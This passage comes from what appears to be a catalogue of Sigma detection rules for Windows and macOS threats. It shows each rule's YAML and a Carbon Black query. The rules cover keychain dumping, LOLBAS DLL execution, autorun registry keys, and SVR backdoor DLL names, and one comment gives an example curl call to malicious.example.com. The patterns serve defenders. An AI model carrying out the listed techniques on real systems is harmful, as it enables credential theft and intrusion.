    selection1:
        Image: '/usr/bin/security'
        CommandLine|contains:
            - 'find-certificate'
            - ' export '
    selection2:
        CommandLine|contains:
            - ' dump-keychain '
            - ' login-keychain '
    condition: 1 of selection*
falsepositives:
    - Legitimate administration activities
level: medium

Convert to SIEM query

medium Strong Medium FP

Cscript/Wscript Potentially Suspicious Child Process

Detects potentially suspicious child processes of Wscript/Cscript. These include processes such as rundll32 with uncommon exports or PowerShell spawning rundll32 or regsvr32. Malware such as Pikabot and Qakbot were seen using similar techniques as well as many others.

status test author Nasreddine Bencherchali (Nextron Systems), Alejandro Houspanossian ('@lekz86') ATT&CK tactic-only id b6676963-0353-4f88-90f5-36c20d443c6a

carbon_black query

(ParentImage:\\wscript.exe OR ParentImage:\\cscript.exe) (Image:\\rundll32.exe OR ((Image:\\cmd.exe OR Image:\\powershell.exe OR Image:\\pwsh.exe) ((CommandLine:mshta* CommandLine:http*) OR (CommandLine:rundll32* OR CommandLine:regsvr32* OR CommandLine:msiexec*)))) (-(Image:\\rundll32.exe (CommandLine:UpdatePerUserSystemParameters* OR CommandLine:PrintUIEntry* OR CommandLine:ClearMyTracksByProcess*)))

view Sigma YAML

title: Cscript/Wscript Potentially Suspicious Child Process
id: b6676963-0353-4f88-90f5-36c20d443c6a
status: test
description: |
    Detects potentially suspicious child processes of Wscript/Cscript. These include processes such as rundll32 with uncommon exports or PowerShell spawning rundll32 or regsvr32.
    Malware such as Pikabot and Qakbot were seen using similar techniques as well as many others.
references:
    - Internal Research
    - https://github.com/pr0xylife/Pikabot/blob/fc58126127adf0f65e78f4eec59675523f48f086/Pikabot_30.10.2023.txt
    - https://github.com/pr0xylife/Pikabot/blob/fc58126127adf0f65e78f4eec59675523f48f086/Pikabot_22.12.2023.txt
author: Nasreddine Bencherchali (Nextron Systems), Alejandro Houspanossian ('@lekz86')
date: 2023-05-15
modified: 2024-01-02
tags:
    - attack.execution
logsource:
    category: process_creation
    product: windows
detection:
    selection_parent:
        ParentImage|endswith:
            - '\wscript.exe'
            - '\cscript.exe'
    selection_cli_script_main:
        Image|endswith:
            - '\cmd.exe'
            - '\powershell.exe'
            - '\pwsh.exe'
    # Note: Add other combinations that are suspicious
    selection_cli_script_option_mshta:
        CommandLine|contains|all:
            - 'mshta'
            - 'http'
    selection_cli_script_option_other:
        CommandLine|contains:
            - 'rundll32'
            - 'regsvr32'
            - 'msiexec'
    selection_cli_standalone:
        Image|endswith: '\rundll32.exe'
    filter_main_rundll32_known_exports:
        Image|endswith: '\rundll32.exe'
        CommandLine|contains:
            - 'UpdatePerUserSystemParameters'
            - 'PrintUIEntry'
            - 'ClearMyTracksByProcess'
    condition: selection_parent and ( selection_cli_standalone or (selection_cli_script_main and 1 of selection_cli_script_option_*) ) and not 1 of filter_main_*
falsepositives:
    - Some false positives might occur with admin or third party software scripts. Investigate and apply additional filters accordingly.
level: medium

Convert to SIEM query

medium Strong Medium FP

Curl Web Request With Potential Custom User-Agent

Detects execution of "curl.exe" with a potential custom "User-Agent". Attackers can leverage this to download or exfiltrate data via "curl" to a domain that only accept specific "User-Agent" strings

status test author Nasreddine Bencherchali (Nextron Systems) ATT&CK tactic-only id 85de1f22-d189-44e4-8239-dc276b45379b

carbon_black query

(Image:\\curl.exe OR OriginalFileName:curl.exe) (CommandLine:\\s-H\\s OR CommandLine:\-\-header*) CommandLine:User\-Agent\:*

view Sigma YAML

title: Curl Web Request With Potential Custom User-Agent
id: 85de1f22-d189-44e4-8239-dc276b45379b
status: test
description: Detects execution of "curl.exe" with a potential custom "User-Agent". Attackers can leverage this to download or exfiltrate data via "curl" to a domain that only accept specific "User-Agent" strings
references:
    - https://labs.withsecure.com/publications/fin7-target-veeam-servers
    - https://github.com/WithSecureLabs/iocs/blob/344203de742bb7e68bd56618f66d34be95a9f9fc/FIN7VEEAM/iocs.csv
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-07-27
modified: 2025-12-11
tags:
    - attack.execution
logsource:
    category: process_creation
    product: windows
detection:
    # Example: This command line would trigger the rule
    # curl.exe -H "User-Agent: EvilAgent" http://malicious.example.com
    selection_img:
        - Image|endswith: '\curl.exe'
        - OriginalFileName: 'curl.exe'
    selection_header_flag_1:
        CommandLine|re: '\s-H\s' # Must be Regex as the flag needs to be case sensitive
    selection_header_flag_2:
        CommandLine|contains: '--header'
    selection_user_agent:
        CommandLine|contains: 'User-Agent:'
    condition: selection_img and 1 of selection_header_* and selection_user_agent
falsepositives:
    - Unknown
level: medium
regression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_curl_custom_user_agent/info.yml

Convert to SIEM query

medium Moderate High FP

Curl.EXE Execution With Custom UserAgent

Detects execution of curl.exe with custom useragent options

status test author frack113 ATT&CK sub-technique id 3286d37a-00fd-41c2-a624-a672dcd34e60

carbon_black query

(Image:\\curl.exe OR Product:The\ curl\ executable) (CommandLine:\ \-A\ * OR CommandLine:\ \-\-user\-agent\ *)

view Sigma YAML

title: Curl.EXE Execution With Custom UserAgent
id: 3286d37a-00fd-41c2-a624-a672dcd34e60
status: test
description: Detects execution of curl.exe with custom useragent options
references:
    - https://curl.se/docs/manpage.html
    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1071.001/T1071.001.md#atomic-test-2---malicious-user-agents---cmd
author: frack113
date: 2022-01-23
modified: 2023-02-21
tags:
    - attack.command-and-control
    - attack.t1071.001
    - detection.threat-hunting
logsource:
    category: process_creation
    product: windows
detection:
    selection_curl:
        - Image|endswith: '\curl.exe'
        - Product: 'The curl executable'
    selection_opt:
        CommandLine|contains:
            - ' -A '
            - ' --user-agent '
    condition: all of selection_*
falsepositives:
    - Scripts created by developers and admins
    - Administrative activity
level: medium

Convert to SIEM query

medium Strong Medium FP

CurrentControlSet Autorun Keys Modification

Detects modification of autostart extensibility point (ASEP) in registry.

status test author Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) ATT&CK sub-technique id f674e36a-4b91-431e-8aef-f8a96c2aca35

carbon_black query

(TargetObject:\\SYSTEM\\CurrentControlSet\\Control* (TargetObject:\\Terminal\ Server\\WinStations\\RDP\-Tcp\\InitialProgram* OR TargetObject:\\Terminal\ Server\\Wds\\rdpwd\\StartupPrograms* OR TargetObject:\\SecurityProviders\\SecurityProviders* OR TargetObject:\\SafeBoot\\AlternateShell* OR TargetObject:\\Print\\Providers* OR TargetObject:\\Print\\Monitors* OR TargetObject:\\NetworkProvider\\Order* OR TargetObject:\\Lsa\\Notification\ Packages* OR TargetObject:\\Lsa\\Authentication\ Packages* OR TargetObject:\\BootVerificationProgram\\ImagePath*)) (-(Details:\(Empty\) OR (Image:C\:\\Windows\\System32\\spoolsv.exe TargetObject:\\Print\\Monitors\\CutePDF\ Writer\ Monitor* (Details:cpwmon64_v40.dll OR Details:CutePDF\ Writer)) OR (Image:C\:\\Windows\\System32\\spoolsv.exe TargetObject:Print\\Monitors\\Appmon\\Ports\\Microsoft.Office.OneNote_* (User:AUTHORI* OR User:AUTORI*)) OR (Image:C\:\\Windows\\System32\\poqexec.exe TargetObject:\\NetworkProvider\\Order\\ProviderOrder) OR (Image:C\:\\Windows\\System32\\spoolsv.exe TargetObject:\\Print\\Monitors\\MONVNC\\Driver Details:VNCpm.dll)))

view Sigma YAML

title: CurrentControlSet Autorun Keys Modification
id: f674e36a-4b91-431e-8aef-f8a96c2aca35
related:
    - id: 17f878b8-9968-4578-b814-c4217fc5768c
      type: obsolete
status: test
description: Detects modification of autostart extensibility point (ASEP) in registry.
references:
    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md
    - https://learn.microsoft.com/en-us/sysinternals/downloads/autoruns
    - https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d # a list with registry keys
author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)
date: 2019-10-25
modified: 2023-08-17
tags:
    - attack.privilege-escalation
    - attack.persistence
    - attack.t1547.001
logsource:
    category: registry_set
    product: windows
detection:
    system_control_base:
        TargetObject|contains: '\SYSTEM\CurrentControlSet\Control'
    system_control_keys:
        TargetObject|contains:
            - '\Terminal Server\WinStations\RDP-Tcp\InitialProgram'
            - '\Terminal Server\Wds\rdpwd\StartupPrograms'
            - '\SecurityProviders\SecurityProviders'
            - '\SafeBoot\AlternateShell'
            - '\Print\Providers'
            - '\Print\Monitors'
            - '\NetworkProvider\Order'
            - '\Lsa\Notification Packages'
            - '\Lsa\Authentication Packages'
            - '\BootVerificationProgram\ImagePath'
    filter_empty:
        Details: '(Empty)'
    filter_cutepdf:
        Image: 'C:\Windows\System32\spoolsv.exe'
        TargetObject|contains: '\Print\Monitors\CutePDF Writer Monitor'
        Details:
            - 'cpwmon64_v40.dll'
            - 'CutePDF Writer'
    filter_onenote:
        Image: C:\Windows\System32\spoolsv.exe
        TargetObject|contains: 'Print\Monitors\Appmon\Ports\Microsoft.Office.OneNote_'
        User|contains: # covers many language settings
            - 'AUTHORI'
            - 'AUTORI'
    filter_poqexec:
        Image: 'C:\Windows\System32\poqexec.exe'
        TargetObject|endswith: '\NetworkProvider\Order\ProviderOrder'
    filter_realvnc:
        Image: 'C:\Windows\System32\spoolsv.exe'
        TargetObject|endswith: '\Print\Monitors\MONVNC\Driver'
        Details: 'VNCpm.dll'
    condition: all of system_control_* and not 1 of filter_*
falsepositives:
    - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason
    - Legitimate administrator sets up autorun keys for legitimate reason
level: medium

Convert to SIEM query

medium Strong Medium FP

DCERPC SMB Spoolss Named Pipe

Detects the use of the spoolss named pipe over SMB. This can be used to trigger the authentication via NTLM of any machine that has the spoolservice enabled.

status test author OTR (Open Threat Research) ATT&CK sub-technique id 214e8f95-100a-4e04-bb31-ef6cba8ce07e

carbon_black query

EventID:5145 ShareName:\\\\\*\\IPC$ RelativeTargetName:spoolss

view Sigma YAML

title: DCERPC SMB Spoolss Named Pipe
id: 214e8f95-100a-4e04-bb31-ef6cba8ce07e
status: test
description: Detects the use of the spoolss named pipe over SMB. This can be used to trigger the authentication via NTLM of any machine that has the spoolservice enabled.
references:
    - https://posts.specterops.io/hunting-in-active-directory-unconstrained-delegation-forests-trusts-71f2b33688e1
    - https://dirkjanm.io/a-different-way-of-abusing-zerologon/
    - https://twitter.com/_dirkjan/status/1309214379003588608
author: OTR (Open Threat Research)
date: 2018-11-28
modified: 2022-08-11
tags:
    - attack.lateral-movement
    - attack.t1021.002
logsource:
    product: windows
    service: security
detection:
    selection:
        EventID: 5145
        ShareName: '\\\\\*\\IPC$' # looking for the string \\*\IPC$
        RelativeTargetName: spoolss
    condition: selection
falsepositives:
    - 'Domain Controllers acting as printer servers too? :)'
level: medium

Convert to SIEM query

medium Strong Medium FP

DLL Call by Ordinal Via Rundll32.EXE

Detects calls of DLLs exports by ordinal numbers via rundll32.dll.

status stable author Florian Roth (Nextron Systems) ATT&CK sub-technique id e79a9e79-eb72-4e78-a628-0e7e8f59e89c

carbon_black query

((Image:\\rundll32.exe OR OriginalFileName:RUNDLL32.EXE) (CommandLine:,#* OR CommandLine:,\ #* OR CommandLine:.dll\ #* OR CommandLine:.ocx\ #*)) (-((CommandLine:EDGEHTML.dll* CommandLine:#141*) OR ((ParentImage:\\Msbuild\\Current\\Bin\\* OR ParentImage:\\VC\\Tools\\MSVC\\* OR ParentImage:\\Tracker.exe*) (CommandLine:\\FileTracker32.dll,#1* OR CommandLine:\\FileTracker32.dll\",#1* OR CommandLine:\\FileTracker64.dll,#1* OR CommandLine:\\FileTracker64.dll\",#1*))))

view Sigma YAML

title: DLL Call by Ordinal Via Rundll32.EXE
id: e79a9e79-eb72-4e78-a628-0e7e8f59e89c
status: stable
description: Detects calls of DLLs exports by ordinal numbers via rundll32.dll.
references:
    - https://web.archive.org/web/20200530031906/https://techtalk.pcmatic.com/2017/11/30/running-dll-files-malware-analysis/
    - https://github.com/Neo23x0/DLLRunner
    - https://twitter.com/cyb3rops/status/1186631731543236608
    - https://www.welivesecurity.com/2022/03/01/isaacwiper-hermeticwizard-wiper-worm-targeting-ukraine/
author: Florian Roth (Nextron Systems)
date: 2019-10-22
modified: 2024-07-16
tags:
    - attack.stealth
    - attack.t1218.011
    - detection.threat-hunting
logsource:
    category: process_creation
    product: windows
detection:
    selection_img:
        - Image|endswith: '\rundll32.exe'
        - OriginalFileName: 'RUNDLL32.EXE'
    selection_cli:
        CommandLine|contains:
            - ',#'
            - ', #'
            - '.dll #'  # Sysmon removes , in its log
            - '.ocx #'  # HermeticWizard
    filter_optional_edge:
        CommandLine|contains|all:
            - 'EDGEHTML.dll'
            - '#141'
    filter_optional_vsbuild_dll:
        ParentImage|contains:
            - '\Msbuild\Current\Bin\'
            - '\VC\Tools\MSVC\'
            - '\Tracker.exe'
        CommandLine|contains:
            - '\FileTracker32.dll,#1'
            - '\FileTracker32.dll",#1'
            - '\FileTracker64.dll,#1'
            - '\FileTracker64.dll",#1'
    condition: all of selection_* and not 1 of filter_optional_*
falsepositives:
    - False positives depend on scripts and administrative tools used in the monitored environment.
    - Windows control panel elements have been identified as source (mmc).
level: medium

Convert to SIEM query

medium Moderate High FP

DLL Execution Via Register-cimprovider.exe

Detects using register-cimprovider.exe to execute arbitrary dll file.

status test author Ivan Dyachkov, Yulia Fomina, oscd.community ATT&CK technique id a2910908-e86f-4687-aeba-76a5f996e652

carbon_black query

Image:\\register\-cimprovider.exe (CommandLine:\-path* CommandLine:dll*)

view Sigma YAML

title: DLL Execution Via Register-cimprovider.exe
id: a2910908-e86f-4687-aeba-76a5f996e652
status: test
description: Detects using register-cimprovider.exe to execute arbitrary dll file.
references:
    - https://twitter.com/PhilipTsukerman/status/992021361106268161
    - https://lolbas-project.github.io/lolbas/Binaries/Register-cimprovider/
author: Ivan Dyachkov, Yulia Fomina, oscd.community
date: 2020-10-07
modified: 2021-11-27
tags:
    - attack.privilege-escalation
    - attack.persistence
    - attack.execution
    - attack.stealth
    - attack.t1574
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        Image|endswith: '\register-cimprovider.exe'
        CommandLine|contains|all:
            - '-path'
            - 'dll'
    condition: selection
falsepositives:
    - Unknown
level: medium

Convert to SIEM query

medium Moderate High FP

DLL Execution via Rasautou.exe

Detects using Rasautou.exe for loading arbitrary .DLL specified in -d option and executes the export specified in -p.

status test author Julia Fomina, oscd.community ATT&CK technique id cd3d1298-eb3b-476c-ac67-12847de55813

carbon_black query

(Image:\\rasautou.exe OR OriginalFileName:rasdlui.exe) (CommandLine:\ \-d\ * CommandLine:\ \-p\ *)

view Sigma YAML

title: DLL Execution via Rasautou.exe
id: cd3d1298-eb3b-476c-ac67-12847de55813
status: test
description: Detects using Rasautou.exe for loading arbitrary .DLL specified in -d option and executes the export specified in -p.
references:
    - https://lolbas-project.github.io/lolbas/Binaries/Rasautou/
    - https://github.com/fireeye/DueDLLigence
    - https://www.fireeye.com/blog/threat-research/2019/10/staying-hidden-on-the-endpoint-evading-detection-with-shellcode.html
author: Julia Fomina, oscd.community
date: 2020-10-09
tags:
    - attack.stealth
    - attack.t1218
logsource:
    product: windows
    category: process_creation
    definition: Since options '-d' and '-p' were removed in Windows 10 this rule is relevant only for Windows before 10. And as Windows 7 doesn't log command line in 4688 by default, to detect this attack you need Sysmon 1 configured or KB3004375 installed for command-line auditing (https://support.microsoft.com/en-au/help/3004375/microsoft-security-advisory-update-to-improve-windows-command-line-aud)
detection:
    selection_img:
        - Image|endswith: '\rasautou.exe'
        - OriginalFileName: 'rasdlui.exe'
    selection_cli:
        CommandLine|contains|all:
            - ' -d '
            - ' -p '
    condition: all of selection*
falsepositives:
    - Unlikely
level: medium

Convert to SIEM query

medium Moderate Medium FP

DLL Load By System Process From Suspicious Locations

Detects when a system process (i.e. located in system32, syswow64, etc.) loads a DLL from a suspicious location or a location with permissive permissions such as "C:\Users\Public"

status test author Nasreddine Bencherchali (Nextron Systems) ATT&CK technique id 9e9a9002-56c4-40fd-9eff-e4b09bfa5f6c

carbon_black query

Image:C\:\\Windows\\* (ImageLoaded:C\:\\Users\\Public\\* OR ImageLoaded:C\:\\PerfLogs\\*)

view Sigma YAML

title: DLL Load By System Process From Suspicious Locations
id: 9e9a9002-56c4-40fd-9eff-e4b09bfa5f6c
status: test
description: Detects when a system process (i.e. located in system32, syswow64, etc.) loads a DLL from a suspicious location or a location with permissive permissions such as "C:\Users\Public"
references:
    - https://github.com/hackerhouse-opensource/iscsicpl_bypassUAC (Idea)
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-07-17
modified: 2023-09-18
tags:
    - attack.stealth
    - attack.t1070
logsource:
    product: windows
    category: image_load
detection:
    selection:
        Image|startswith: 'C:\Windows\'
        ImageLoaded|startswith:
            # TODO: Add more suspicious paths as you see fit in your env
            - 'C:\Users\Public\'
            - 'C:\PerfLogs\'
    condition: selection
falsepositives:
    - Unknown
level: medium

Convert to SIEM query

medium Moderate High FP

DLL Loaded via CertOC.EXE

Detects when a user installs certificates by using CertOC.exe to loads the target DLL file.

status test author Austin Songer @austinsonger ATT&CK technique id 242301bc-f92f-4476-8718-78004a6efd9f

carbon_black query

(Image:\\certoc.exe OR OriginalFileName:CertOC.exe) (CommandLine:\ \-LoadDLL\ * OR CommandLine:\ \/LoadDLL\ * OR CommandLine:\ –LoadDLL\ * OR CommandLine:\ —LoadDLL\ * OR CommandLine:\ ―LoadDLL\ *)

view Sigma YAML

title: DLL Loaded via CertOC.EXE
id: 242301bc-f92f-4476-8718-78004a6efd9f
related:
    - id: 84232095-ecca-4015-b0d7-7726507ee793
      type: similar
status: test
description: Detects when a user installs certificates by using CertOC.exe to loads the target DLL file.
references:
    - https://twitter.com/sblmsrsn/status/1445758411803480072?s=20
    - https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-fe98e74189873d6df72a15df2eaa0315c59ba9cdaca93ecd68afc4ea09194ef2
    - https://lolbas-project.github.io/lolbas/Binaries/Certoc/
author: Austin Songer @austinsonger
date: 2021-10-23
modified: 2024-03-05
tags:
    - attack.stealth
    - attack.t1218
logsource:
    category: process_creation
    product: windows
detection:
    selection_img:
        - Image|endswith: '\certoc.exe'
        - OriginalFileName: 'CertOC.exe'
    selection_cli:
        CommandLine|contains|windash: ' -LoadDLL '
    condition: all of selection_*
falsepositives:
    - Unknown
level: medium

Convert to SIEM query

medium Moderate High FP

DLL Names Used By SVR For GraphicalProton Backdoor

Hunts known SVR-specific DLL names.

status test author CISA ATT&CK sub-technique id e64c8ef3-9f98-40c8-b71e-96110991cb4c

carbon_black query

ImageLoaded:\\AclNumsInvertHost.dll OR ImageLoaded:\\AddressResourcesSpec.dll OR ImageLoaded:\\BlendMonitorStringBuild.dll OR ImageLoaded:\\ChildPaletteConnected.dll OR ImageLoaded:\\DeregisterSeekUsers.dll OR ImageLoaded:\\HandleFrequencyAll.dll OR ImageLoaded:\\HardSwapColor.dll OR ImageLoaded:\\LengthInMemoryActivate.dll OR ImageLoaded:\\ModeBitmapNumericAnimate.dll OR ImageLoaded:\\ModeFolderSignMove.dll OR ImageLoaded:\\ParametersNamesPopup.dll OR ImageLoaded:\\PerformanceCaptionApi.dll OR ImageLoaded:\\ScrollbarHandleGet.dll OR ImageLoaded:\\UnregisterAncestorAppendAuto.dll OR ImageLoaded:\\WowIcmpRemoveReg.dll

view Sigma YAML

title: DLL Names Used By SVR For GraphicalProton Backdoor
id: e64c8ef3-9f98-40c8-b71e-96110991cb4c
status: test
description: Hunts known SVR-specific DLL names.
references:
    - https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a
author: CISA
date: 2023-12-18
tags:
    - attack.persistence
    - attack.privilege-escalation
    - attack.execution
    - attack.stealth
    - attack.t1574.001
    - detection.emerging-threats
logsource:
    category: image_load
    product: windows
detection:
    selection:
        ImageLoaded|endswith:
            - '\AclNumsInvertHost.dll'
            - '\AddressResourcesSpec.dll'
            - '\BlendMonitorStringBuild.dll'
            - '\ChildPaletteConnected.dll'
            - '\DeregisterSeekUsers.dll'
            - '\HandleFrequencyAll.dll'
            - '\HardSwapColor.dll'
            - '\LengthInMemoryActivate.dll'
            - '\ModeBitmapNumericAnimate.dll'
            - '\ModeFolderSignMove.dll'
            - '\ParametersNamesPopup.dll'
            - '\PerformanceCaptionApi.dll'
            - '\ScrollbarHandleGet.dll'
            - '\UnregisterAncestorAppendAuto.dll'
            - '\WowIcmpRemoveReg.dll'
    condition: selection
falsepositives:
    - Unknown
level: medium

Convert to SIEM query

medium Moderate High FP

DMSA Service Account Created in Specific OUs - PowerShell

Detects the creation of a dMSA service account using the New-ADServiceAccount cmdlet in certain OUs. The fact that the cmdlet is used to create a dMSASvc account in a specific OU is highly suspicious. It is a pattern trying to exploit the BadSuccessor privilege escalation vulnerability in Windows Server 2025. On top of that, if the user that is creating the dMSASvc account is not a legitimate administrator or does not have the necessary permissions, it is a strong signal of an attempted or successful abuse of the BaDSuccessor vulnerability for privilege escalation within the Windows Server 2025 Active Directory environment.

status experimental author Swachchhanda Shrawan Poudel (Nextron Systems) ATT&CK sub-technique id 02122374-b74e-495c-b285-9e4da973f3d6

carbon_black query

ScriptBlockText:New\-ADServiceAccount* ScriptBlockText:\-CreateDelegatedServiceAccount* ScriptBlockText:\-path*

view Sigma YAML

title: DMSA Service Account Created in Specific OUs - PowerShell
id: 02122374-b74e-495c-b285-9e4da973f3d6
related:
    - id: e15bc294-ae2a-45ad-b7d6-637b33868bde # Windows Security Creation of New MsDS-DelegatedManagedServiceAccount (DMSA) Object
      type: similar
    - id: 0ea8db81-2ff6-4525-9448-33bbe7effc13 # Process Creation Detection
      type: similar
status: experimental
description: |
    Detects the creation of a dMSA service account using the New-ADServiceAccount cmdlet in certain OUs.
    The fact that the cmdlet is used to create a dMSASvc account in a specific OU is highly suspicious.
    It is a pattern trying to exploit the BadSuccessor privilege escalation vulnerability in Windows Server 2025.
    On top of that, if the user that is creating the dMSASvc account is not a legitimate administrator or does not have the necessary permissions,
    it is a strong signal of an attempted or successful abuse of the BaDSuccessor vulnerability for privilege escalation within the Windows Server 2025 Active Directory environment.
references:
    - https://www.akamai.com/blog/security-research/abusing-bad-successor-for-privilege-escalation-in-active-directory
author: Swachchhanda Shrawan Poudel (Nextron Systems)
date: 2025-05-24
tags:
    - attack.privilege-escalation
    - attack.initial-access
    - attack.persistence
    - attack.stealth
    - attack.t1078.002
    - attack.t1098
logsource:
    category: ps_script
    product: windows
detection:
    selection:
        ScriptBlockText|contains|all:
            - 'New-ADServiceAccount'
            - '-CreateDelegatedServiceAccount'
            - '-path'
    condition: selection
falsepositives:
    - Unknown
level: medium

Convert to SIEM query

medium Moderate High FP

DNS Query Request By Regsvr32.EXE

Detects DNS queries initiated by "Regsvr32.exe"

status test author Dmitriy Lifanov, oscd.community ATT&CK sub-technique id 36e037c4-c228-4866-b6a3-48eb292b9955

carbon_black query

Image:\\regsvr32.exe

view Sigma YAML

title: DNS Query Request By Regsvr32.EXE
id: 36e037c4-c228-4866-b6a3-48eb292b9955
related:
    - id: c7e91a02-d771-4a6d-a700-42587e0b1095
      type: derived
status: test
description: Detects DNS queries initiated by "Regsvr32.exe"
references:
    - https://pentestlab.blog/2017/05/11/applocker-bypass-regsvr32/
    - https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/
author: Dmitriy Lifanov, oscd.community
date: 2019-10-25
modified: 2023-09-18
tags:
    - attack.execution
    - attack.stealth
    - attack.t1559.001
    - attack.t1218.010
logsource:
    category: dns_query
    product: windows
detection:
    selection:
        Image|endswith: '\regsvr32.exe'
    condition: selection
falsepositives:
    - Unknown
level: medium

Convert to SIEM query

medium Strong Medium FP

DNS Query To AzureWebsites.NET By Non-Browser Process

Detects a DNS query by a non browser process on the system to "azurewebsites.net". The latter was often used by threat actors as a malware hosting and exfiltration site.

status test author Nasreddine Bencherchali (Nextron Systems) ATT&CK sub-technique id e043f529-8514-4205-8ab0-7f7d2927b400

carbon_black query

QueryName:azurewebsites.net (-((Image:C\:\\Program\ Files\\Google\\Chrome\\Application\\chrome.exe OR Image:C\:\\Program\ Files\ \(x86\)\\Google\\Chrome\\Application\\chrome.exe) OR (Image:C\:\\Program\ Files\\Mozilla\ Firefox\\firefox.exe OR Image:C\:\\Program\ Files\ \(x86\)\\Mozilla\ Firefox\\firefox.exe) OR (Image:C\:\\Program\ Files\ \(x86\)\\Internet\ Explorer\\iexplore.exe OR Image:C\:\\Program\ Files\\Internet\ Explorer\\iexplore.exe) OR (Image:C\:\\Program\ Files\ \(x86\)\\Microsoft\\EdgeWebView\\Application\\* OR Image:\\WindowsApps\\MicrosoftEdge.exe OR (Image:C\:\\Program\ Files\ \(x86\)\\Microsoft\\Edge\\Application\\msedge.exe OR Image:C\:\\Program\ Files\\Microsoft\\Edge\\Application\\msedge.exe)) OR ((Image:C\:\\Program\ Files\ \(x86\)\\Microsoft\\EdgeCore\\* OR Image:C\:\\Program\ Files\\Microsoft\\EdgeCore\\*) (Image:\\msedge.exe OR Image:\\msedgewebview2.exe)) OR Image:\\safari.exe OR (Image:\\MsMpEng.exe OR Image:\\MsSense.exe) OR (Image:\\brave.exe Image:C\:\\Program\ Files\\BraveSoftware\\*) OR (Image:\\AppData\\Local\\Maxthon\\* Image:\\maxthon.exe) OR (Image:\\AppData\\Local\\Programs\\Opera\\* Image:\\opera.exe) OR ((Image:C\:\\Program\ Files\\SeaMonkey\\* OR Image:C\:\\Program\ Files\ \(x86\)\\SeaMonkey\\*) Image:\\seamonkey.exe) OR (Image:\\AppData\\Local\\Vivaldi\\* Image:\\vivaldi.exe) OR ((Image:C\:\\Program\ Files\\Naver\\Naver\ Whale\\* OR Image:C\:\\Program\ Files\ \(x86\)\\Naver\\Naver\ Whale\\*) Image:\\whale.exe) OR Image:\\Tor\ Browser\\* OR ((Image:C\:\\Program\ Files\\Waterfox\\* OR Image:C\:\\Program\ Files\ \(x86\)\\Waterfox\\*) Image:\\Waterfox.exe) OR (Image:\\AppData\\Local\\Programs\\midori\-ng\\* Image:\\Midori\ Next\ Generation.exe) OR ((Image:C\:\\Program\ Files\\SlimBrowser\\* OR Image:C\:\\Program\ Files\ \(x86\)\\SlimBrowser\\*) Image:\\slimbrowser.exe) OR (Image:\\AppData\\Local\\Flock\\* Image:\\Flock.exe) OR (Image:\\AppData\\Local\\Phoebe\\* Image:\\Phoebe.exe) OR ((Image:C\:\\Program\ Files\\Falkon\\* OR Image:C\:\\Program\ Files\ \(x86\)\\Falkon\\*) Image:\\falkon.exe) OR ((Image:C\:\\Program\ Files\ \(x86\)\\Avant\ Browser\\* OR Image:C\:\\Program\ Files\\Avant\ Browser\\*) Image:\\avant.exe)))

view Sigma YAML

title: DNS Query To AzureWebsites.NET By Non-Browser Process
id: e043f529-8514-4205-8ab0-7f7d2927b400
related:
    - id: 5c80b618-0dbb-46e6-acbb-03d90bcb6d83
      type: derived
status: test
description: |
    Detects a DNS query by a non browser process on the system to "azurewebsites.net". The latter was often used by threat actors as a malware hosting and exfiltration site.
references:
    - https://www.sentinelone.com/labs/wip26-espionage-threat-actors-abuse-cloud-infrastructure-in-targeted-telco-attacks/
    - https://symantec-enterprise-blogs.security.com/threat-intelligence/harvester-new-apt-attacks-asia
    - https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/
    - https://intezer.com/blog/research/how-we-escaped-docker-in-azure-functions/
author: Nasreddine Bencherchali (Nextron Systems)
date: 2024-06-24
tags:
    - attack.command-and-control
    - attack.t1219.002
logsource:
    product: windows
    category: dns_query
detection:
    selection:
        QueryName|endswith: 'azurewebsites.net'
    filter_optional_chrome:
        Image:
            - 'C:\Program Files\Google\Chrome\Application\chrome.exe'
            - 'C:\Program Files (x86)\Google\Chrome\Application\chrome.exe'
    filter_optional_firefox:
        Image:
            - 'C:\Program Files\Mozilla Firefox\firefox.exe'
            - 'C:\Program Files (x86)\Mozilla Firefox\firefox.exe'
    filter_optional_ie:
        Image:
            - 'C:\Program Files (x86)\Internet Explorer\iexplore.exe'
            - 'C:\Program Files\Internet Explorer\iexplore.exe'
    filter_optional_edge_1:
        - Image|startswith: 'C:\Program Files (x86)\Microsoft\EdgeWebView\Application\'
        - Image|endswith: '\WindowsApps\MicrosoftEdge.exe'
        - Image:
              - 'C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe'
              - 'C:\Program Files\Microsoft\Edge\Application\msedge.exe'
    filter_optional_edge_2:
        Image|startswith:
            - 'C:\Program Files (x86)\Microsoft\EdgeCore\'
            - 'C:\Program Files\Microsoft\EdgeCore\'
        Image|endswith:
            - '\msedge.exe'
            - '\msedgewebview2.exe'
    filter_optional_safari:
        Image|endswith: '\safari.exe'
    filter_optional_defender:
        Image|endswith:
            - '\MsMpEng.exe' # Microsoft Defender executable
            - '\MsSense.exe' # Windows Defender Advanced Threat Protection Service Executable
    filter_optional_brave:
        Image|endswith: '\brave.exe'
        Image|startswith: 'C:\Program Files\BraveSoftware\'
    filter_optional_maxthon:
        Image|contains: '\AppData\Local\Maxthon\'
        Image|endswith: '\maxthon.exe'
    filter_optional_opera:
        Image|contains: '\AppData\Local\Programs\Opera\'
        Image|endswith: '\opera.exe'
    filter_optional_seamonkey:
        Image|startswith:
            - 'C:\Program Files\SeaMonkey\'
            - 'C:\Program Files (x86)\SeaMonkey\'
        Image|endswith: '\seamonkey.exe'
    filter_optional_vivaldi:
